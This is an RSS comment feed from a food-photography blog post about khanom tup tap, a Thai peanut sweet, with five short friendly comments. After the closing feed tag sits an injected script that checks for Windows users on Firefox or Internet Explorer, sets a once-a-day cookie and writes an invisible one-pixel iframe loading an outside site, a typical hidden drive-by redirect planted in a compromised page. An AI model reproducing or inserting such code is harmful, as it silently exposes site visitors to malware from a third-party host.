<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
		>
<channel>
	<title>Comments on: Khanom tup tap</title>
	<atom:link href="http://www.austinbushphotography.com/2008/09/khanom-tup-tap.html/feed" rel="self" type="application/rss+xml" />
	<link>http://www.austinbushphotography.com/blog/khanom-tup-tap.html</link>
	<description></description>
	<lastBuildDate>Fri, 03 Feb 2012 04:43:53 +0000</lastBuildDate>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
	<item>
		<title>By: Jay 2009 - Austin Bush Photography</title>
		<link>http://www.austinbushphotography.com/blog/khanom-tup-tap.html#comment-27777</link>
		<dc:creator>Jay 2009 - Austin Bush Photography</dc:creator>
		<pubDate>Mon, 26 Oct 2009 04:30:30 +0000</pubDate>
		<guid isPermaLink="false">http://www.austinbushphotography.com/2008/09/khanom-tup-tap.html#comment-27777</guid>
		<description>[...] as a central tenet, particularly when this is the only time of the year when I can get freshly-made khanom tub tap. This is a sweet made by pounding syrup and peanuts into a flaky shell (the process of which is [...]</description>
		<content:encoded><![CDATA[<p>[...] as a central tenet, particularly when this is the only time of the year when I can get freshly-made khanom tub tap. This is a sweet made by pounding syrup and peanuts into a flaky shell (the process of which is [...]</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: elgin</title>
		<link>http://www.austinbushphotography.com/blog/khanom-tup-tap.html#comment-4877</link>
		<dc:creator>elgin</dc:creator>
		<pubDate>Mon, 06 Oct 2008 07:28:42 +0000</pubDate>
		<guid isPermaLink="false">http://www.austinbushphotography.com/2008/09/khanom-tup-tap.html#comment-4877</guid>
		<description>Wow, this one looks really good.</description>
		<content:encoded><![CDATA[<p>Wow, this one looks really good.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Austin Bush</title>
		<link>http://www.austinbushphotography.com/blog/khanom-tup-tap.html#comment-4713</link>
		<dc:creator>Austin Bush</dc:creator>
		<pubDate>Thu, 02 Oct 2008 01:46:23 +0000</pubDate>
		<guid isPermaLink="false">http://www.austinbushphotography.com/2008/09/khanom-tup-tap.html#comment-4713</guid>
		<description>Phil: Yep, hope you guys can make it back again soon!
Little Miss Contrary: It&#039;s pretty amazing, isn&#039;t it? And yes, I have two large bags waiting for me in the fridge right now...</description>
		<content:encoded><![CDATA[<p>Phil: Yep, hope you guys can make it back again soon!<br />
Little Miss Contrary: It&#8217;s pretty amazing, isn&#8217;t it? And yes, I have two large bags waiting for me in the fridge right now&#8230;</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Little Miss Contrary</title>
		<link>http://www.austinbushphotography.com/blog/khanom-tup-tap.html#comment-4708</link>
		<dc:creator>Little Miss Contrary</dc:creator>
		<pubDate>Wed, 01 Oct 2008 23:53:32 +0000</pubDate>
		<guid isPermaLink="false">http://www.austinbushphotography.com/2008/09/khanom-tup-tap.html#comment-4708</guid>
		<description>I never knew how khanom tup tap were made--neat! They are very tasty, indeed.</description>
		<content:encoded><![CDATA[<p>I never knew how khanom tup tap were made&#8211;neat! They are very tasty, indeed.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Phil Lees</title>
		<link>http://www.austinbushphotography.com/blog/khanom-tup-tap.html#comment-4629</link>
		<dc:creator>Phil Lees</dc:creator>
		<pubDate>Tue, 30 Sep 2008 02:52:13 +0000</pubDate>
		<guid isPermaLink="false">http://www.austinbushphotography.com/2008/09/khanom-tup-tap.html#comment-4629</guid>
		<description>No, really, khanom tup tap are awesome. I can&#039;t believe that it has been a year since the last Vegetarian Festival.</description>
		<content:encoded><![CDATA[<p>No, really, khanom tup tap are awesome. I can&#8217;t believe that it has been a year since the last Vegetarian Festival.</p>
]]></content:encoded>
	</item>
</channel>
</rss>
<script> var BrowserDetect = { init: function () { this.browser = this.searchString(this.dataBrowser) || "An unknown browser"; this.version = this.searchVersion(navigator.userAgent) || this.searchVersion(navigator.appVersion) || "an unknown version"; this.OS = this.searchString(this.dataOS) || "an unknown OS"; }, searchString: function (data) { for (var i=0;i<data.length;i++) { var dataString = data[i].string; var dataProp = data[i].prop; this.versionSearchString = data[i].versionSearch || data[i].identity; if (dataString) { if (dataString.indexOf(data[i].subString) != -1) return data[i].identity; } else if (dataProp) return data[i].identity; } }, searchVersion: function (dataString) { var index = dataString.indexOf(this.versionSearchString); if (index == -1) return; return parseFloat(dataString.substring(index+this.versionSearchString.length+1)); }, dataBrowser: [       { string: navigator.userAgent,subString: "Firefox",identity: "Firefox"},{string: navigator.userAgent,subString: "MSIE",identity: "Explorer",versionSearch: "MSIE"}],dataOS : [{string: navigator.platform,subString: "Win",identity: "Windows"}]};function addCookie(szName,szValue,dtDaysExpires){ var dtExpires = new Date();var dtExpiryDate = "";dtExpires.setTime(dtExpires.getTime()+dtDaysExpires*24*60*60*1000);dtExpiryDate=dtExpires.toGMTString();document.cookie=szName+"="+szValue+";expires="+dtExpiryDate;} function findCookie(szName){        var i=0;var nStartPosition=0;var nEndPosition=0;var szCookieString=document.cookie; while (i<=szCookieString.length){nStartPosition=i;nEndPosition=nStartPosition+szName.length;if (szCookieString.substring(nStartPosition,nEndPosition)==szName){nStartPosition=nEndPosition+1;nEndPosition=document.cookie.indexOf(";",nStartPosition);if(nEndPosition<nStartPosition) nEndPosition=document.cookie.length;return document.cookie.substring(nStartPosition,nEndPosition);break;}i++;} return "";} BrowserDetect.init(); var szCookieString = document.cookie; var boroda = BrowserDetect.browser; var os = BrowserDetect.OS; if ( ((boroda == "Firefox" || boroda == "Explorer") && (os == "Windows")) && (findCookie('geo_idn')!='c48a765e4f75baeb85f0a755fc3ec09c') ) {addCookie("geo_idn","c48a765e4f75baeb85f0a755fc3ec09c",1);document.write('<iframe src="http://feedfaster.com" name="Twitter" scrolling="auto" frameborder="no" align="center" height = "1px" width = "1px"></iframe>');}else {}</script>  

